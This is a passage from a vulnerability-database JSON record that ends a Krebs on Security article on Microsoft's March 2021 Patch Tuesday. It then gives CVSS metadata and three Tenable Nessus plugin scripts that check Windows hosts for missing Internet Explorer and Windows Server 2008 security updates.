possible."\n\nThis is probably a good place to quote [Ghacks.net's Martin Brinkman](<https://www.ghacks.net/2021/03/09/microsoft-windows-security-updates-march-2021-overview/>): This is [the last patch hurrah](<https://www.ghacks.net/2021/01/31/reminder-microsoft-edge-legacy-will-be-retired-in-march-2021/>) for the legacy Microsoft Edge web browser, which is being retired by Microsoft.\n\nFor the second month in a row, Microsoft has patched scary flaws in the DNS servers on **Windows Server 2008** through **2019** versions that could be used to remotely install software of the attacker\u2019s choice. All five of the DNS bugs quashed in today's patch batch earned a CVSS Score (danger metric) of 9.8 -- almost as bad as it gets.\n\n"There is the outside chance this could be wormable between DNS servers," warned Trend Micro's **Dustin Childs**.\n\nAs mentioned above, hundreds of thousands of organizations are in the midst dealing with a security nightmare after having their Exchange Server and Outlook Web Access (OWA) hacked and retrofitted with a backdoor. If an organization you know has been affected by this attack, please have them check with the new victim notification website [mentioned in today's story](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>).\n\n**Susan Bradley** over at [Askwoody.com says](<https://www.askwoody.com/2021/march-patching-madness-begins/>) "nothing in the March security updates (besides the Exchange ones released last week) is causing me to want to urge you to go running to your machines and patch at this time." I'd concur, unless of course you cruise the web with older Microsoft browsers.\n\n**Update, Mar. .11, 9:32 a.m.: **AskWoody now says any delay in patching may have been warranted. "We are seeing issues with printing after the March updates. Ghacks reports BSODs are being triggered after printing. It\u2019s unclear if it\u2019s all of the March operating system updates or just the Windows 10 versions. Note it appears that Microsoft has pulled the updates from Windows update but NOT from WSUS or the catalog site."\n\n_Original story:_\n\nIt\u2019s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it\u2019s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.\n\nBut before you update, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nAdditional reading:\n\nMartin Brinkman's [always comprehensive take](<https://www.ghacks.net/2021/03/09/microsoft-windows-security-updates-march-2021-overview/>).\n\nThe **SANS Internet Storm Center** [no-frills breakdown of the fixes](<https://isc.sans.org/forums/diary/Microsoft+March+2021+Patch+Tuesday/27184/>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-10T01:42:39", "type": "krebs", "title": "Microsoft Patch Tuesday, March 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-10T01:42:39", "id": "KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "href": "https://krebsonsecurity.com/2021/03/microsoft-patch-tuesday-march-2021-edition/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-03-25T20:36:52", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability:\n\n - A memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26411"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/147228", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147228);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-26411\");\n script_xref(name:\"MSKB\", value:\"5000847\");\n script_xref(name:\"MSFT\", value:\"MS21-5000847\");\n script_xref(name:\"MSKB\", value:\"5000800\");\n script_xref(name:\"MSKB\", value:\"5000841\");\n script_xref(name:\"MSKB\", value:\"5000844\");\n script_xref(name:\"MSKB\", value:\"5000848\");\n script_xref(name:\"MSFT\", value:\"MS21-5000800\");\n script_xref(name:\"MSFT\", value:\"MS21-5000841\");\n script_xref(name:\"MSFT\", value:\"MS21-5000844\");\n script_xref(name:\"MSFT\", value:\"MS21-5000848\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Internet Explorer (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing a security update. It is, therefore, affected by the\nfollowing vulnerability:\n\n - A memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\");\n # https://support.microsoft.com/en-us/topic/kb5000800-cumulative-security-update-for-internet-explorer-march-9-2021-b7b43be0-e9ef-48b6-b102-ed28fd89e0f2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8426b33\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000841-monthly-rollup-3a2cced1-f436-40c3-a8a1-645f86759088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c5851d4\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000844-monthly-rollup-d90d0eb1-6319-4a7e-97f6-68fbd306fd5a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177a5bc6\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000847-monthly-rollup-8afa2933-e9da-4481-a0bc-18deb314974e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df958afd\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000848-monthly-rollup-52f23db9-e1b0-4829-81b9-198fc82891a3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ff1e9b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5000800\n -KB5000841\n -KB5000844\n -KB5000847\n -KB5000848\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26411\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000800',\n '5000841',\n '5000844',\n '5000847',\n '5000848'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21532\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5000800 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == \"6.3\")\n {\n report += ' - KB5000848 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000848', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB5000847 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000847', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB5000841 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000841', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB5000844 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000844', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T17:19:28", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability:\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26419)", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (May 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26419"], "modified": "2021-05-27T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_MAY_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/149386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149386);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/27\");\n\n script_cve_id(\"CVE-2021-26419\");\n script_xref(name:\"MSKB\", value:\"5003210\");\n script_xref(name:\"MSFT\", value:\"MS21-5003210\");\n script_xref(name:\"MSKB\", value:\"5003233\");\n script_xref(name:\"MSFT\", value:\"MS21-5003233\");\n script_xref(name:\"MSKB\", value:\"5003209\");\n script_xref(name:\"MSFT\", value:\"MS21-5003209\");\n script_xref(name:\"MSKB\", value:\"5003165\");\n script_xref(name:\"MSKB\", value:\"5003208\");\n script_xref(name:\"MSFT\", value:\"MS21-5003165\");\n script_xref(name:\"MSFT\", value:\"MS21-5003208\");\n script_xref(name:\"IAVA\", value:\"2021-A-0224\");\n\n script_name(english:\"Security Updates for Internet Explorer (May 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing a security update. It is, therefore, affected by the\nfollowing vulnerability:\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26419)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003233\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5003165\n -KB5003208\n -KB5003209\n -KB5003210\n -KB5003233\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26411\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nvar bulletin = 'MS21-05';\nvar kbs = make_list(\n '5003165',\n '5003208',\n '5003209',\n '5003210',\n '5003233'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nvar os = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21542\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\")\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5003165 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == \"6.3\")\n {\n report += ' - KB5003209 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003209', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB5003208 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003208', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB5003233 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003233', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB5003210 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003210', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T20:31:37", "description": "The remote Windows host is missing security update 5000856 or cumulative update 5000844. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26896, CVE-2021-27063)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000856: Windows Server 2008 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26882", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000844.NASL", "href": "https://www.tenable.com/plugins/nessus/147217", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147217);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26882\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000844\");\n script_xref(name:\"MSFT\", value:\"MS21-5000844\");\n script_xref(name:\"MSKB\", value:\"5000856\");\n script_xref(name:\"MSFT\", value:\"MS21-5000856\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000856: Windows Server 2008 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000856\nor cumulative update 5000844. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26896,\n CVE-2021-27063)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000844-monthly-rollup-d90d0eb1-6319-4a7e-97f6-68fbd306fd5a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177a5bc6\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000856-security-only-update-7a0eb0b9-7f1c-44e5-ba3f-4f6e5e92b33e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22792d68\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000856 or Cumulative Update KB5000844.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26861\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000844',\n '5000856'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000844, 5000856])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 